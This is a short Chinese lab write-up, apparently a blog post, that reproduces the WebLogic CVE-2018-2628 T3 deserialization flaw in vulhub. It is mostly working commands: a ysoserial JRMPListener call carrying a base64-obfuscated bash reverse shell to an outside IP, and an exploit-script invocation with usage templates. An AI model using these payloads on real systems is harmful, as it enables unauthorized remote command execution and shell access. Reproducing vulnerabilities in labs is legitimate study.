Weblogic WLS Core Components 反序列化命令执行漏洞(CVE-2018-2628)

Weblogic WLS Core Components 反序列化命令执行漏洞(CVE-2018-2628)

复现环境:
vulhub
漏洞原因:
Weblogic Server WLS Core Components中出现的一个反序列化漏洞(CVE-2018-2628),该漏洞通过t3协议触发,可导致未授权的用户在远程服务器执行任意命令。
复现过程:
启动一个执行反弹shell的一个JRMP Server:
在这里插入图片描述
payload:

java -cp ysoserial-master-8eb5cbfbf6-1.jar ysoserial.exploit.JRMPListener 4456 CommonsCollections1 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjEuNDEuNTUuNjAvMTc3MjcgMD4mMQ==}|{base64,-d}|{bash,-i}'

使用expdb的脚本,向目标Weblogic发送数据包:
在这里插入图片描述

payload:

  python weblogicUnserizlize.py 192.168.43.250 7001  ysoserial-master-8eb5cbfbf6-1.jar 192.168.43.250 4456 JRMPClient

shell反弹成功:
在这里插入图片描述
补充:

jar用法:java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener [listen port] CommonsCollections1 [command]
py用法:python exploit.py  [目标 ip]  [目标 port]  [path to ysoserial]  [JRMPListener ip] [JRMPListener port] [JRMPClient]
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值